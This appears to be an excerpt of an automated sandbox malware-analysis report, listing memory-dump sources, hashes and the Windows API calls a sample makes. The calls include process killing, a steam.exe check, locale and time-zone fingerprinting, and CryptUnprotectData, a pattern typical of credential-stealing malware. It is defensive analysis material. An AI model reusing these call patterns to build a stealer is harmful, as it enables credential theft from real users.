                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 2c2733f86a8a7c2849fd4cd1d4163b874e016b6533d7ebfc4052b571342ba1b7
                                • Instruction ID: 300ee1d04a862c65c5ad63856f6e3f657941bf0b2cb98bcc98cfdf1207e7b3c2
                                • Opcode Fuzzy Hash: 2c2733f86a8a7c2849fd4cd1d4163b874e016b6533d7ebfc4052b571342ba1b7
                                • Instruction Fuzzy Hash: FF41853051021D9BDB72EF28ED89AAE77F4AF10304F015168FA899B1A1CF7CDC51AB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !,8$&@,$1^zf$=2[?$HVw$Jjw$a8Ug${"$$5_o$:?$s;
                                • API String ID: 0-4025474785
                                • Opcode ID: 3ac1bf0da465575a4988a81b31576677ce14481d17170c9d97e13042719c0977
                                • Instruction ID: 3299f4738db64980aea0d614668b1b84bee9f6af547a14708a8411bcae412629
                                • Opcode Fuzzy Hash: 3ac1bf0da465575a4988a81b31576677ce14481d17170c9d97e13042719c0977
                                • Instruction Fuzzy Hash: 73B2F9F3A0C2149FE304AE2DEC8567ABBE9EF94720F16453DEAC5C7740EA3558018697
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 010146B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 010146C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 010146DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 010146ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 01014702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 01014711
                                • CloseHandle.KERNEL32(00000000), ref: 01014718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 01014726
                                • CloseHandle.KERNEL32(00000000), ref: 01014731
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 646aa348660e612282b59e57c5b0e237cf4b0057645fe59dbd94b432378621bb
                                • Instruction ID: bbdcb3208d75cb63d103f32f60591c995ce8a7ec6b201def0824eb312eedd022
                                • Opcode Fuzzy Hash: 646aa348660e612282b59e57c5b0e237cf4b0057645fe59dbd94b432378621bb
                                • Instruction Fuzzy Hash: D901A131501128BBEB315F64AC8CFFE37BCEB49B15F000088FA45D5088EF7899848B65
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 01014628
                                • Process32First.KERNEL32(00000000,00000128), ref: 01014638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 0101464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 01014660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 01014672
                                • CloseHandle.KERNEL32(00000000), ref: 0101467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: e40740db47fabc79ab7a1ac3e0f8dc1770a511a1398e2fdcb49c3b245a3e6c84
                                • Instruction ID: 70396f434772713f60ba964b007c92dfbac6c1f792974ba2934a0f0de1e7a5fe
                                • Opcode Fuzzy Hash: e40740db47fabc79ab7a1ac3e0f8dc1770a511a1398e2fdcb49c3b245a3e6c84
                                • Instruction Fuzzy Hash: 08018471601128ABEB709E64AC4CFEE77ACEB0C755F0001D5FA48D1044EB78D6948BE5
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01004B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01004B7F
                                • lstrlen.KERNEL32(01024CA8), ref: 01004B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004BA7
                                • lstrcat.KERNEL32(00000000,01024CA8), ref: 01004BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 01004BFA
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: 5546a1f67c90b721d112f57230ae42e611dcacc17cc05b6cad78711c8a8d2906
                                • Instruction ID: bb614699479752800f4cc9aa15f220544a1e0c1d27709f7c4faa5e8edc78ec8b
                                • Opcode Fuzzy Hash: 5546a1f67c90b721d112f57230ae42e611dcacc17cc05b6cad78711c8a8d2906
                                • Instruction Fuzzy Hash: 2C31613151051D9BEB72EF28EC89AAE77F9AF40300F001168FB45D72A1CB789C11AB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: )t3b$-Qj}$=u]$Sg+$^_xW$7:l$^<$qWR
                                • API String ID: 0-3336059591
                                • Opcode ID: 1cbbaaf11e90bb220fefcccb0f7d178c84dc171141e2336d88063aaa0eab080b
                                • Instruction ID: 8aa1def37f1d82850acb46a28ec7c70f4aa3e76288039e2a003ab47ab7e9ec76
                                • Opcode Fuzzy Hash: 1cbbaaf11e90bb220fefcccb0f7d178c84dc171141e2336d88063aaa0eab080b
                                • Instruction Fuzzy Hash: 37B238F36082049FE304AE2DEC8567AFBE5EFD4620F1A853DE6C4C7744EA3598058697
                                APIs
                                  • Part of subcall function 010171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 010171FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 01012D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 01012DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 01012DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 01012DEC
                                • LocalFree.KERNEL32(00000000), ref: 01012FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: ca303550297fff3969400a22c745ea69a5da31d1a2a568b6ebc49fcac63d74e5
                                • Instruction ID: 5560bcdd929aa7e19a7f849e9ad17087ef2ca9b5bbae460bc4abb12ce26091c3
                                • Opcode Fuzzy Hash: ca303550297fff3969400a22c745ea69a5da31d1a2a568b6ebc49fcac63d74e5
                                • Instruction Fuzzy Hash: 10B11C70900214DFDB65CF19D548B99BBF1FB44328F29C1ADE5485B2A9D77A9C82CF80
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 01012C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 01012C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 01012C58
                                • wsprintfA.USER32 ref: 01012C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: f55083e97fc5a5ea6a9641dd0eb3e883ff0b51358f9acf8c80161a52506ffa18
                                • Instruction ID: e47b478a245c77ec58831efa3a0558a5fc42f058e5f0234ba610a8269e74dfcb
                                • Opcode Fuzzy Hash: f55083e97fc5a5ea6a9641dd0eb3e883ff0b51358f9acf8c80161a52506ffa18
                                • Instruction Fuzzy Hash: 7801F771A00214BBDB288F58DC4DF6DBB69EB84621F104369F915DB2C4D77819008BD5
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *;$'(w~$(j_$RvWE$w_~
                                • API String ID: 0-722192857
                                • Opcode ID: 73b8e635258c6dc7f997d3d71b083a9af21b6179933b49a4b6e91eb503a14009
                                • Instruction ID: 1caf847c98fc573f3393aa579a7561d59f8347b41c98ab94f3b58318e6901290
                                • Opcode Fuzzy Hash: 73b8e635258c6dc7f997d3d71b083a9af21b6179933b49a4b6e91eb503a14009
                                • Instruction Fuzzy Hash: D9B2E6F3A0C200AFE3046E2DEC8567AFBE9EF94720F16492DEAC4D7744E67558018697
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 01011B72
                                  • Part of subcall function 01011820: lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0101184F
                                  • Part of subcall function 01011820: lstrlen.KERNEL32(00D56B90), ref: 01011860
                                  • Part of subcall function 01011820: lstrcpy.KERNEL32(00000000,00000000), ref: 01011887
                                  • Part of subcall function 01011820: lstrcat.KERNEL32(00000000,00000000), ref: 01011892
                                  • Part of subcall function 01011820: lstrcpy.KERNEL32(00000000,00000000), ref: 010118C1
                                  • Part of subcall function 01011820: lstrlen.KERNEL32(01024FA0), ref: 010118D3
                                  • Part of subcall function 01011820: lstrcpy.KERNEL32(00000000,00000000), ref: 010118F4
                                  • Part of subcall function 01011820: lstrcat.KERNEL32(00000000,01024FA0), ref: 01011900
                                  • Part of subcall function 01011820: lstrcpy.KERNEL32(00000000,00000000), ref: 0101192F
                                • sscanf.NTDLL ref: 01011B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 01011BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 01011BC6
                                • ExitProcess.KERNEL32 ref: 01011BE3
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: 8b3e2ecf22b0eaa31eb6daf29497e55a64b6d9bb0082eaf9797a6e257ba694e4
                                • Instruction ID: 58198d90c2fd865abc18c28cee6d17ca1b02c29a7adcee7ff2e5b6c48179e650
                                • Opcode Fuzzy Hash: 8b3e2ecf22b0eaa31eb6daf29497e55a64b6d9bb0082eaf9797a6e257ba694e4
                                • Instruction Fuzzy Hash: 4D21F3B1518305AF8764DF69D88489FBBF8FFD8214F409A1EF599C3214E734D6098BA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FF775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FF778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00FF77AD
